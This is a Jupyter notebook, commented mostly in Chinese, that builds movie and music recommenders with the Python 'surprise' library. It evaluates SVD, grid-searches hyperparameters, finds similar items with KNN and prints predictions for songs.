"from surprise import SVD,KNNWithMeans\nfrom surprise import Dataset\nfrom surprise import evaluate,print_perf\n\n# load movielens datasets\ndata = Dataset.load_builtin('ml-100k')\n\n# k折交叉验证\n%time data.split(n_folds = 3)\n\n# 试试SVD分解\n%time algo = SVD()\nprint (algo)\n# Evaluate the performance of the algorithm on given data\n# return A dictionary containing measures as keys and lists as values. Each list contains one entry per fold\n%time perf = evaluate(algo,data,measures=[u'rmse', u'mae'] )\n%time print_perf(perf)",
"Wall time: 68 ms\nWall time: 0 ns\n<surprise.prediction_algorithms.matrix_factorization.SVD object at 0x00000000123A3C18>\nEvaluating RMSE, MAE of algorithm SVD.\n\n------------\nFold 1\n"
],
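[
"# A minimal illustrative sketch (not part of the original notebook): after evaluate()\n# above, algo has been fit on the last fold, so it can score a single (user, item) pair.\n# Raw ids in ml-100k are strings; we reuse the first raw rating from the loaded data.\nuid, iid, true_r, _ = data.raw_ratings[0]\npred = algo.predict(uid, iid, r_ui = true_r, verbose = True)\nprint(pred.est)",
"_____no_output_____"
],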
[
"data.raw_ratings[0]",
"_____no_output_____"
]
],
[
[
"### 算法调参",
"_____no_output_____"
],
[
"### 这里实现的算法是SVD 等,一些超参数的选择也会最终影响后果。下面可以使用sklearn 中的网格搜索交叉验证来GridsearchCV来选择最终的参数\n\n",
"_____no_output_____"
]
],
[
[
"from surprise import GridSearch\nfrom surprise import SVD # or KNNWithMeans also can be OK!\nfrom surprise import Dataset\n# Following parameters use can be understand by help(GridSearch)\nalgo_class = SVD # KNNWithMeans also can be OK!\nparam_grid = {'n_epochs':[5,10], 'lr_all':[0.002,0.005], 'reg_all':[0.4,0.6]}\nmeasures = ['rmse', 'mae']\n\ngridsearch = GridSearch(algo_class,param_grid,measures, n_jobs = -1 , verbose = True)\ndata = Dataset.load_builtin('ml-100k')\ndata.split(n_folds = 4)\n\ngridsearch.evaluate(data)",
"Running grid search for the following parameter combinations:\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 5}\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 10}\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 5}\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 10}\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 5}\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 10}\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 5}\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 10}\nResulsts:\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 5}\n{u'MAE': 0.8018551244250034, u'RMSE': 0.9932174367810193}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 10}\n{u'MAE': 0.7832613784600437, u'RMSE': 0.9749094382803938}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 5}\n{u'MAE': 0.8110030936953079, u'RMSE': 0.9996999802164589}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 10}\n{u'MAE': 0.7940102667564738, u'RMSE': 0.9834308452554275}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 5}\n{u'MAE': 0.7796992803135402, u'RMSE': 0.9710325407811311}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 10}\n{u'MAE': 0.7711126696361924, u'RMSE': 0.9618930607113133}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 5}\n{u'MAE': 0.7909796864971992, u'RMSE': 0.9801357839418171}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 10}\n{u'MAE': 0.7831766193962327, u'RMSE': 0.9719639652268127}\n----------\n"
]
],
[
[
"### 用户216 对电影11的打分是5.0分,时间是880234346",
"_____no_output_____"
]
],
[
[
"data.raw_ratings[1] # user, item, rating, timestamp",
"_____no_output_____"
]
],
[
[
"### 输出模型评价",
"_____no_output_____"
]
],
[
[
"gridsearch.best_score",
"_____no_output_____"
],
[
"gridsearch.best_score['rmse']",
"_____no_output_____"
],
[
"gridsearch.best_estimator",
"_____no_output_____"
],
[
"gridsearch.best_params",
"_____no_output_____"
],
[
"gridsearch.best_params['mae']",
"_____no_output_____"
],
[
"gridsearch.best_params['rmse']",
"_____no_output_____"
],
[
"gridsearch.best_score",
"_____no_output_____"
],
[
"gridsearch.best_index",
"_____no_output_____"
],
[
"gridsearch.cv_results",
"_____no_output_____"
],
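[
"# Hedged sketch (not run in the original notebook): GridSearch used above is deprecated\n# in newer surprise releases in favour of GridSearchCV from surprise.model_selection\n# (see the help() output below). Assuming surprise >= 1.05, the same search looks like:\nfrom surprise import SVD, Dataset\nfrom surprise.model_selection import GridSearchCV\n\nparam_grid = {'n_epochs': [5, 10], 'lr_all': [0.002, 0.005], 'reg_all': [0.4, 0.6]}\ngs = GridSearchCV(SVD, param_grid, measures = ['rmse', 'mae'], cv = 4, n_jobs = -1)\ngs.fit(Dataset.load_builtin('ml-100k'))\n\nprint(gs.best_score['rmse'])\nprint(gs.best_params['rmse'])",
"_____no_output_____"
],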
[
"help(GridSearch)",
"Help on class GridSearch in module surprise.evaluate:\n\nclass GridSearch\n | .. warning::\n | Deprecated since version 1.05. Use :func:`GridSearchCV\n | <surprise.model_selection.search.GridSearchCV>` instead. This\n | class will be removed in later versions.\n | \n | The :class:`GridSearch` class, used to evaluate the performance of an\n | algorithm on various combinations of parameters, and extract the best\n | combination. It is analogous to `GridSearchCV\n | <http://scikit-learn.org/stable/modules/generated/sklearn.\n | model_selection.GridSearchCV.html>`_ from scikit-learn.\n | \n | See :ref:`User Guide <tuning_algorithm_parameters>` for usage.\n | \n | Args:\n | algo_class(:obj:`AlgoBase <surprise.prediction_algorithms.algo_base.AlgoBase>`): The class\n | object of the algorithm to evaluate.\n | param_grid(dict): Dictionary with algorithm parameters as keys and\n | list of values as keys. All combinations will be evaluated with\n | desired algorithm. Dict parameters such as ``sim_options`` require\n | special treatment, see :ref:`this note<grid_search_note>`.\n | measures(list of string): The performance measures to compute. Allowed\n | names are function names as defined in the :mod:`accuracy\n | <surprise.accuracy>` module. Default is ``['rmse', 'mae']``.\n | n_jobs(int): The maximum number of algorithm training in parallel.\n | \n | - If ``-1``, all CPUs are used.\n | - If ``1`` is given, no parallel computing code is used at all, which is useful for debugging.\n | - For ``n_jobs`` below ``-1``, ``(n_cpus + n_jobs + 1)`` are used. For example, with ``n_jobs = -2`` all CPUs but one are used.\n | \n | Default is ``1``.\n | pre_dispatch(int or string): Controls the number of jobs that get\n | dispatched during parallel execution. Reducing this number can be\n | useful to avoid an explosion of memory consumption when more jobs\n | get dispatched than CPUs can process. This parameter can be:\n | \n | - ``None``, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs.\n | - An int, giving the exact number of total jobs that are spawned.\n | - A string, giving an expression as a function of ``n_jobs``, as in ``'2*n_jobs'``.\n | \n | Default is ``'2*n_jobs'``.\n | seed(int): The value to use as seed for RNG. It will determine how\n | splits are defined. If ``None``, the current time since epoch is\n | used. Default is ``None``.\n | verbose(bool): Level of verbosity. If ``False``, nothing is printed. If\n | ``True``, The mean values of each measure are printed along for\n | each parameter combination. Default is ``True``.\n | joblib_verbose(int): Controls the verbosity of joblib: the higher, the\n | more messages.\n | \n | Attributes:\n | cv_results (dict of arrays):\n | A dict that contains all parameters and accuracy information for\n | each combination. 
Can be imported into a pandas `DataFrame`.\n | best_estimator (dict of AlgoBase):\n | Using an accuracy measure as key, get the estimator that gave the\n | best accuracy results for the chosen measure.\n | best_score (dict of floats):\n | Using an accuracy measure as key, get the best score achieved for\n | that measure.\n | best_params (dict of dicts):\n | Using an accuracy measure as key, get the parameters combination\n | that gave the best accuracy results for the chosen measure.\n | best_index (dict of ints):\n | Using an accuracy measure as key, get the index that can be used\n | with `cv_results` that achieved the highest accuracy for that\n | measure.\n | \n | Methods defined here:\n | \n | __init__(self, algo_class, param_grid, measures=[u'rmse', u'mae'], n_jobs=1, pre_dispatch=u'2*n_jobs', seed=None, verbose=1, joblib_verbose=0)\n | \n | evaluate(self, data)\n | Runs the grid search on dataset.\n | \n | Class instance attributes can be accessed after the evaluate is done.\n | \n | Args:\n | data (:obj:`Dataset <surprise.dataset.Dataset>`): The dataset on\n | which to evaluate the algorithm.\n\n"
]
],
[
[
"## 协同过滤建模后,根据一个items寻找相似度最高的item,使用algo.get_neighbors 函数\n ",
"_____no_output_____"
]
],
[
[
"### 先认识一下处理的数据 特征\n### in C:\\Users\\Yazhou\\.surprise_data\\ml-100k\\ml-100k\\u/item\nimport io\nimport os\nfile_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')\nwith io.open(file_name,'r',encoding = 'ISO-8859-1') as f:\n for line in f:\n #print \">>>Output: \",line\n pass",
"_____no_output_____"
]
],
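[
[
"# A small illustrative sketch (added, not from the original notebook): peek at the first\n# u.item record to show the 'movie id|title|release date|...' layout that the\n# read_item_names() parser below splits on. io and file_name come from the cell above.\nwith io.open(file_name, 'r', encoding = 'ISO-8859-1') as f:\n    print(f.readline().strip())",
"_____no_output_____"
]
],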
[
[
"### 1. 针对自带的Movielens 数据集做推荐",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import,division,print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import Dataset\nfrom surprise import KNNBasic # or KNNBaseline\n\nfile_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')\ndef read_item_names():\n \"获取电影ID到电影名字,电影名字到电影ID的映射关系\"\n rid_to_name = {}\n name_to_rid = {}\n with io.open(file_name,'r',encoding = 'ISO-8859-1') as f: # \"ISO-8859-1\" 是官方指定的字体\n for line in f:\n line = line.split('|') # 从上面的数据格式可以看出原始数据是ID|Name 的先后顺序\n #print(\"line is:\",line)\n rid_to_name[line[0]] = line[1] # 字典,line[0] is key, line[1] is value # 数据在dict中的位置并不是line[0]\n name_to_rid[line[1]] = line[0] # 字典, line[1] is key, line[0] is value,\n #print (\"line[0] is \", line[0])\n #print (\"line[1] is \", line[1])\n #print (\">>> rid_to_name is\",rid_to_name)\n #print (\"<<< name_to_rid is\",name_to_rid)\n return rid_to_name,name_to_rid \n\n\"利用算法来计算item之间的相似度\"\ndata = Dataset.load_builtin('ml-100k')\nimport random\nmy_seed = 200\nrandom.seed(my_seed)\ntrainset = data.build_full_trainset()\n# data.split(n_folds = 4,shuffle = True) # Split the dataset into folds for future cross-validation from help(data)\nsim_options = {'name':'pearson_baseline','user_based':False,'verbose':True}\n# 基于用户的协同过滤\nalgo = KNNBasic(sim_options = sim_options)\nalgo.fit(trainset)\n",
"Estimating biases using als...\nComputing the pearson_baseline similarity matrix...\nDone computing similarity matrix.\n"
],
[
"\"下面的例子证明字典里面的数据:'This is one new movies' 并没有出现在第3的位置\"\ndict1 = {u'1': u'Toy Story (1995)', u'2': u'GoldenEye (1995)'}\ndict1[3] = 'This is one new movies'\ndict1",
"_____no_output_____"
],
[
"\"计算pearson_baseline相似矩阵\"\nsimilarity_matrix = algo.compute_similarities()",
"Computing the pearson_baseline similarity matrix...\nDone computing similarity matrix.\n"
],
[
"\"获取电影ID到电影名字,电影名字到电影ID的数据映射关系\"\nrid_to_name,name_to_rid = read_item_names()",
"_____no_output_____"
],
[
"\"rid_to_name 数据:电影ID到电影名字的映射字典\"\nrid_to_name",
"_____no_output_____"
],
[
"\"name_to_rid 数据:电影名字到电影ID的映射字典\"\nname_to_rid",
"_____no_output_____"
],
[
"\"原始电影ID到 inner id 的转化过程: 转化来着模型的数据需要\"\nraw_movie_id = name_to_rid['Bye Bye, Love (1995)'] # Toy Story (1995) # Bye Bye, Love (1995)\n#raw_movie_id => 1446 raw movie id \n\niinder_movie_id = algo.trainset.to_inner_iid(raw_movie_id)\n#iinder_movie_id => 1217 inner movie id for using in model",
"_____no_output_____"
],
[
"\"通过get_neighbors 来计算inner id: iid = 1217 的最近/最相似的k个相似\"\niid = iinder_movie_id\nk = 12\n\n\"找到的距离目标最近的几个item,返回的inner id:iid\" \"to_raw_iid/to_inner_iid 都是针对item的id转换\" \nkneighbors_iid = algo.get_neighbors(iid, k) # Returns:The list of the ``k`` (inner) ids of the closest users (or items)to ``iid``\n\n\"将inner id:iid 转换成原始id:rawid\"\nkneighbors_rawid = (algo.trainset.to_raw_iid(k_iid) for k_iid in kneighbors_iid) # 返回生成器\n\n\"依照原始id:rawid 找到对应的电影名字\"\nmovie_withrawid = [rid_to_name[k_rawid] for k_rawid in kneighbors_rawid] # 也可以是生成器,但是写成了list了\n\n\"打印输出跟目标最相似的几个电影名字\"\n#for movie in movie_withrawid:\n# print (\"找到跟目标电影最相似的k(k = 12)个电影分别是:\",movie)\n\nfor kth in range(0,k):\n print (\"找到跟目标电影最相似的第 %d 电影是: %s\" %(1 + kth,movie_withrawid[kth]))\n ",
"找到跟目标电影最相似的第 1 电影是: Paper, The (1994)\n找到跟目标电影最相似的第 2 电影是: Godfather, The (1972)\n找到跟目标电影最相似的第 3 电影是: Hunt for Red October, The (1990)\n找到跟目标电影最相似的第 4 电影是: Down Periscope (1996)\n找到跟目标电影最相似的第 5 电影是: Brady Bunch Movie, The (1995)\n找到跟目标电影最相似的第 6 电影是: Speed (1994)\n找到跟目标电影最相似的第 7 电影是: Home Alone (1990)\n找到跟目标电影最相似的第 8 电影是: Young Frankenstein (1974)\n找到跟目标电影最相似的第 9 电影是: Fifth Element, The (1997)\n找到跟目标电影最相似的第 10 电影是: That Thing You Do! (1996)\n找到跟目标电影最相似的第 11 电影是: Willy Wonka and the Chocolate Factory (1971)\n找到跟目标电影最相似的第 12 电影是: With Honors (1994)\n"
]
],
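[
[
"# A reusable wrapper around the lookup above (the helper name get_similar_movies is ours,\n# not from the original notebook). It relies on algo, name_to_rid and rid_to_name\n# defined in the earlier cells.\ndef get_similar_movies(movie_name, k = 10):\n    raw_id = name_to_rid[movie_name]\n    inner_id = algo.trainset.to_inner_iid(raw_id)\n    neighbor_inner_ids = algo.get_neighbors(inner_id, k)\n    return [rid_to_name[algo.trainset.to_raw_iid(nid)] for nid in neighbor_inner_ids]\n\nfor title in get_similar_movies('Toy Story (1995)', k = 5):\n    print(title)",
"_____no_output_____"
]
],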
[
[
"### 2.使用音乐数据预测",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌单ID到歌单名字的映射关系\"\nplaylistid_to_name = {}\nplaylistid_to_name = pickle.load(open(\"./InternalData/6_popular_playlist.pkl\", 'rb'))\nprint(\"重建流行歌单ID到歌单名字的映射关系 完成....\")\n\n\"重建歌单名到歌单ID的映射关系\"\nplaylistname_to_id = {}\nfor playlist_id in playlistid_to_name:\n playlistname_to_id[playlistid_to_name[playlist_id]] = playlist_id\nprint(\"重建流行歌单名到歌单ID的映射关系 完成....\")\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\n\n\"计算歌曲之间的相识度\"\nmusic_full_trainset = loaded_musicdata.build_full_trainset()\nprint(\"构建数据集合完成。。。\")",
"重建流行歌单ID到歌单名字的映射关系 完成....\n重建流行歌单名到歌单ID的映射关系 完成....\n构建数据集合完成。。。\n"
],
[
"\"歌单ID到歌单的映射关系,存放在这样一个字典中\"\n#playlistid_to_name.keys()\n#playlistid_to_name.values()",
"_____no_output_____"
],
[
"print (playlistid_to_name[playlistid_to_name.keys()[2] ])",
"100种深情皆苦 | 你又不知道我难过\n"
],
[
"\"music 基本数据特征\"\nmusic_full_trainset.n_users\n#music_full_trainset.n_items\n#music_full_trainset.rating_scale\n#music_full_trainset.global_mean",
"_____no_output_____"
]
],
[
[
"### 2.1下面是针对歌单的个性推荐",
"_____no_output_____"
]
],
[
[
"\"开始训练模型 - 找到相似的歌单(默认一个用户只建立一个歌单playlist)\"\nalgo = KNNBaseline() # \"默认是用户base 的KNN\"\nalgo.train(music_full_trainset)\n\n\"目标歌单名字\"\ntarget_playlistname = playlistname_to_id.keys()[39]\nprint (\"目标歌单名字:\",target_playlistname)\n\n\"目标歌单ID\"\ntarget_playlistid = playlistname_to_id[target_playlistname]\nprint (\"目标歌单原始ID:\",target_playlistid)\n\n\"将原始歌单ID转成inner id,用于get_neighbors 预测\" \".to_inner_uid/to_raw_uid 都是针对user:uid的函数推荐\"\ntarget_playlistiid = algo.trainset.to_inner_uid(target_playlistid)\nprint (\"目标歌单内部ID:\",target_playlistiid)\nk = 10\nplaylist_neignhbors_kid = algo.get_neighbors(target_playlistiid,k = k)\n\n\"将预测出的k个inner id 转成原始id:raw_id\"\nplaylist_neignhbors_rid = [algo.trainset.to_raw_uid(innerid) for innerid in playlist_neignhbors_kid]\n\"有k 个原始id:raw_id 找到对应的歌单名字\"\nplaylist_neignhbors_name = [playlistid_to_name[raw_uid] for raw_uid in playlist_neignhbors_rid]\n\n\"打印输出这k个电影名字:\"\nprint(\"\\n跟目标歌单<<\",target_playlistname,\">>相似的k个歌单分别是:\" )\nfor raw_playlistname in playlist_neignhbors_name:\n print (raw_playlistname,\"对应的inner id是:\",algo.trainset.to_inner_uid(playlistname_to_id[raw_playlistname]))",
"c:\\python27\\lib\\site-packages\\surprise\\prediction_algorithms\\algo_base.py:51: UserWarning: train() is deprecated. Use fit() instead\n warnings.warn('train() is deprecated. Use fit() instead', UserWarning)\n"
],
[
"\"针对歌曲个性推荐\"\nfrom __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌曲ID到歌曲名字的映射关系\"\nsongid_to_name = {}\nsongid_to_name = pickle.load(open(\"./InternalData/7_popular_song.pkl\", 'rb'))\nprint (\"歌曲ID到歌曲名字的映射...完成!\")\n\"歌曲名字到歌曲ID的映射\"\nsongname_to_id = {}\nfor song_id in songid_to_name:\n songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value\nprint(\"歌曲名字到歌曲ID的映射....完成!\")\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_songdata = Dataset.load_from_file(file_path = file_path, reader = reader)\nsong_full_trainset = loaded_songdata.build_full_trainset()\n\n\"模型\"\nalgo = KNNWithMeans()\nalgo.train(song_full_trainset)\n\n\"目标歌曲名字\"\ntarget_songname = songname_to_id.keys()[98]\nprint(\"目标歌曲名字 是:\",target_songname)\ntarget_songid = songname_to_id[target_songname]\nalgo.train.to-\n\n\n",
"歌曲ID到歌曲名字的映射...完成!\n歌曲名字到歌曲ID的映射....完成!\nComputing the msd similarity matrix...\nDone computing similarity matrix.\n目标歌曲名字 是: 难忘的一天\t许巍\n"
]
],
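[
[
"# Hedged sketch completing the lookup that the cell above sets up: find songs similar to\n# target_songname. The model above is user-based by default, so a separate item-based\n# KNN (the item_algo name is ours, for illustration) is fit here, mirroring the MovieLens example.\nsim_options = {'name': 'pearson_baseline', 'user_based': False}\nitem_algo = KNNBaseline(sim_options = sim_options)\nitem_algo.fit(song_full_trainset)\n\nneighbor_inner_ids = item_algo.get_neighbors(item_algo.trainset.to_inner_iid(target_songid), k = 10)\nfor inner_id in neighbor_inner_ids:\n    print(songid_to_name[item_algo.trainset.to_raw_iid(inner_id)])",
"_____no_output_____"
]
],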
[
[
"### 2.2 下面是针对歌曲的个性推荐",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌曲ID到歌曲名字的映射关系\"\nsongid_to_name = {}\nsongid_to_name = pickle.load(open(\"./InternalData/7_popular_song.pkl\", 'rb'))\nprint (\"歌曲ID到歌曲名字的映射...完成!\")\n\"歌曲名字到歌曲ID的映射\"\nsongname_to_id = {}\nfor song_id in songid_to_name:\n songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value\nprint(\"歌曲名字到歌曲ID的映射....完成!\")\n\n\"inner id = 4 的用户\"\nuser_inner_id = 4\n\n\"ur(:obj:`defaultdict` of :obj:`list`): The users ratings. This is a \\\ndictionary containing lists of tuples of the form ``(item_inner_id,\\\nrating)``. The keys are user inner ids.\"\nitem_inner_id_andrating = music_full_trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)\nitem_inner_id = map(lambda x:x[0], item_inner_id_andrating)\n\nfor item_iid in item_inner_id:\n print (algo.predict(uid = user_inner_id,iid = item_iid,r_ui = None, clip = True,verbose=False),\n songid_to_name[algo.trainset.to_raw_iid(item_iid)])",
"歌曲ID到歌曲名字的映射...完成!\n歌曲名字到歌曲ID的映射....完成!\nuser: 4 item: 478 r_ui = None est = 1.00 {u'was_impossible': False} 听见下雨的声音\t魏如昀\nuser: 4 item: 429 r_ui = None est = 1.00 {u'was_impossible': False} 梦一场\t萧敬腾\nuser: 4 item: 936 r_ui = None est = 1.00 {u'was_impossible': False} 干杯\t西瓜Kune\nuser: 4 item: 937 r_ui = None est = 1.00 {u'was_impossible': False} 给自己的歌 (Live) - live\t纵贯线\nuser: 4 item: 938 r_ui = None est = 1.00 {u'was_impossible': False} 小半\t陈粒\nuser: 4 item: 939 r_ui = None est = 1.00 {u'was_impossible': False} 思念是一种病(Live) - live\t张震岳\nuser: 4 item: 940 r_ui = None est = 1.00 {u'was_impossible': False} 可以不可以\t丁当\nuser: 4 item: 941 r_ui = None est = 1.00 {u'was_impossible': False} 秋酿\t房东的猫\nuser: 4 item: 616 r_ui = None est = 1.00 {u'was_impossible': False} 退后\t周杰伦\nuser: 4 item: 942 r_ui = None est = 1.00 {u'was_impossible': False} 阴天\t莫文蔚\nuser: 4 item: 943 r_ui = None est = 1.00 {u'was_impossible': False} 痛爱\t容祖儿\nuser: 4 item: 944 r_ui = None est = 1.00 {u'was_impossible': False} 二十世纪少年(Unplugged) - unplug\tPing Pung\nuser: 4 item: 945 r_ui = None est = 1.00 {u'was_impossible': False} 前所未见\t陈慧琳\nuser: 4 item: 946 r_ui = None est = 1.00 {u'was_impossible': False} 追梦赤子心\tGALA\nuser: 4 item: 947 r_ui = None est = 1.00 {u'was_impossible': False} 如果你也听说\t张惠妹\nuser: 4 item: 948 r_ui = None est = 1.00 {u'was_impossible': False} 寄生\t吴克羣\nuser: 4 item: 949 r_ui = None est = 1.00 {u'was_impossible': False} 怎么唱情歌\t刘惜君\nuser: 4 item: 55 r_ui = None est = 1.00 {u'was_impossible': False} 忽然之间\t巴士那\nuser: 4 item: 950 r_ui = None est = 1.00 {u'was_impossible': False} 烟霞\t容祖儿\nuser: 4 item: 138 r_ui = None est = 1.00 {u'was_impossible': False} 小幸运\t双笙\nuser: 4 item: 951 r_ui = None est = 1.00 {u'was_impossible': False} 错过\t王铮亮\nuser: 4 item: 952 r_ui = None est = 1.00 {u'was_impossible': False} 泪海\t许茹芸\nuser: 4 item: 453 r_ui = None est = 1.00 {u'was_impossible': False} 外面的世界\t莫文蔚\nuser: 4 item: 840 r_ui = None est = 1.00 {u'was_impossible': False} 短发\t梁咏琪\nuser: 4 item: 953 r_ui = None est = 1.00 {u'was_impossible': False} 遗憾\t方炯镔\nuser: 4 item: 954 r_ui = None est = 1.00 {u'was_impossible': False} 假如让我说下去\t杨千嬅\nuser: 4 item: 955 r_ui = None est = 1.00 {u'was_impossible': False} 爱你\t许志安\nuser: 4 item: 956 r_ui = None est = 1.00 {u'was_impossible': False} 你的手信\t陈慧敏\nuser: 4 item: 352 r_ui = None est = 1.00 {u'was_impossible': False} 遗憾\t许美静\nuser: 4 item: 957 r_ui = None est = 1.00 {u'was_impossible': False} 无终\t谢春花\nuser: 4 item: 958 r_ui = None est = 1.00 {u'was_impossible': False} 骄傲的少年\t南征北战\nuser: 4 item: 959 r_ui = None est = 1.00 {u'was_impossible': False} 一个人一座城\t曹寅\nuser: 4 item: 960 r_ui = None est = 1.00 {u'was_impossible': False} 好得很\t麦家瑜\nuser: 4 item: 961 r_ui = None est = 1.00 {u'was_impossible': False} 终身美丽\t郑秀文\nuser: 4 item: 962 r_ui = None est = 1.00 {u'was_impossible': False} 倾城\t许美静\nuser: 4 item: 963 r_ui = None est = 1.00 {u'was_impossible': False} 想要你知道\t许亚童\nuser: 4 item: 964 r_ui = None est = 1.00 {u'was_impossible': False} 忆她\t赵烁\nuser: 4 item: 965 r_ui = None est = 1.00 {u'was_impossible': False} 边走边唱\t李荣浩\nuser: 4 item: 966 r_ui = None est = 1.00 {u'was_impossible': False} 再见只是陌生人\t庄心妍\nuser: 4 item: 967 r_ui = None est = 1.00 {u'was_impossible': False} 每条伤心的大街\t飘乐队\nuser: 4 item: 968 r_ui = None est = 1.00 {u'was_impossible': False} 死结\t李玖哲\nuser: 4 item: 969 r_ui = None est = 1.00 {u'was_impossible': False} 我是你的影子\tXun(易硕成)\nuser: 4 item: 970 r_ui = None est = 1.00 {u'was_impossible': False} 孤儿仔\t陈奕迅\nuser: 4 item: 971 r_ui = None est = 1.00 {u'was_impossible': False} 
霜雪千年\t双笙\nuser: 4 item: 972 r_ui = None est = 1.00 {u'was_impossible': False} 想起小时候\t前冲\nuser: 4 item: 755 r_ui = None est = 1.00 {u'was_impossible': False} 给自己的情书\t王菲\nuser: 4 item: 279 r_ui = None est = 1.00 {u'was_impossible': False} 情非得已\t庾澄庆\nuser: 4 item: 973 r_ui = None est = 1.00 {u'was_impossible': False} 听说爱情回来过(Live) - live\t张敬轩\nuser: 4 item: 715 r_ui = None est = 1.00 {u'was_impossible': False} 至少还有你\t林忆莲\nuser: 4 item: 974 r_ui = None est = 1.00 {u'was_impossible': False} 致自己\t齐一\nuser: 4 item: 975 r_ui = None est = 1.00 {u'was_impossible': False} 可惜我不是他\tXun\nuser: 4 item: 976 r_ui = None est = 1.00 {u'was_impossible': False} 恋人心\t魏新雨\nuser: 4 item: 977 r_ui = None est = 1.00 {u'was_impossible': False} 美好事物\t房东的猫\nuser: 4 item: 978 r_ui = None est = 1.00 {u'was_impossible': False} 你就要走了\t花粥\nuser: 4 item: 979 r_ui = None est = 1.00 {u'was_impossible': False} 一半\t薛之谦\nuser: 4 item: 259 r_ui = None est = 1.00 {u'was_impossible': False} 斑马斑马 - 翻唱\t房东的猫\nuser: 4 item: 980 r_ui = None est = 1.00 {u'was_impossible': False} 还想听你的故事\t谢春花\nuser: 4 item: 981 r_ui = None est = 1.00 {u'was_impossible': False} 房间\t刘瑞琦\nuser: 4 item: 982 r_ui = None est = 1.00 {u'was_impossible': False} 狮子座(live)\t曾轶可\nuser: 4 item: 611 r_ui = None est = 1.00 {u'was_impossible': False} 青花瓷\t周杰伦\nuser: 4 item: 983 r_ui = None est = 1.00 {u'was_impossible': False} 目前\t洪卓立\nuser: 4 item: 984 r_ui = None est = 1.00 {u'was_impossible': False} 月球下的人\t李幸倪\nuser: 4 item: 985 r_ui = None est = 1.00 {u'was_impossible': False} 明明\t钟一宪\nuser: 4 item: 986 r_ui = None est = 1.00 {u'was_impossible': False} 一棵会开花的树(demo)\t谢春花\nuser: 4 item: 987 r_ui = None est = 1.00 {u'was_impossible': False} 借我\t谢春花\nuser: 4 item: 209 r_ui = None est = 1.00 {u'was_impossible': False} 丑八怪\t薛之谦\nuser: 4 item: 988 r_ui = None est = 1.00 {u'was_impossible': False} 习惯失恋\t容祖儿\nuser: 4 item: 989 r_ui = None est = 1.00 {u'was_impossible': False} 红玫瑰\t陈奕迅\nuser: 4 item: 192 r_ui = None est = 1.00 {u'was_impossible': False} 漂洋过海来看你\t周深\nuser: 4 item: 990 r_ui = None est = 1.00 {u'was_impossible': False} 那女孩对我说\t黄义达\nuser: 4 item: 991 r_ui = None est = 1.00 {u'was_impossible': False} 后来\t群星\nuser: 4 item: 992 r_ui = None est = 1.00 {u'was_impossible': False} 喜剧之王\t李荣浩\nuser: 4 item: 993 r_ui = None est = 1.00 {u'was_impossible': False} 爱你\t陈芳语\nuser: 4 item: 994 r_ui = None est = 1.00 {u'was_impossible': False} 我爱你\t卢广仲\nuser: 4 item: 995 r_ui = None est = 1.00 {u'was_impossible': False} 遇见你的时候所有星星都落到我头上\t高姗\nuser: 4 item: 996 r_ui = None est = 1.00 {u'was_impossible': False} 一身诗意千寻瀑\t不才\nuser: 4 item: 997 r_ui = None est = 1.00 {u'was_impossible': False} 你在烦恼什么\t苏打绿\nuser: 4 item: 998 r_ui = None est = 1.00 {u'was_impossible': False} 我为自己代言\t魏晨\nuser: 4 item: 141 r_ui = None est = 1.00 {u'was_impossible': False} 夜空中最亮的星\t逃跑计划\nuser: 4 item: 999 r_ui = None est = 1.00 {u'was_impossible': False} 阴天快乐\t陈奕迅\nuser: 4 item: 132 r_ui = None est = 1.00 {u'was_impossible': False} 原谅\t张玉华\nuser: 4 item: 1000 r_ui = None est = 1.00 {u'was_impossible': False} 放过自己\t庄心妍\nuser: 4 item: 1001 r_ui = None est = 1.00 {u'was_impossible': False} 最好的我\t龚芝怡\nuser: 4 item: 317 r_ui = None est = 1.00 {u'was_impossible': False} 爱一点\t莫艳琳\nuser: 4 item: 1002 r_ui = None est = 1.00 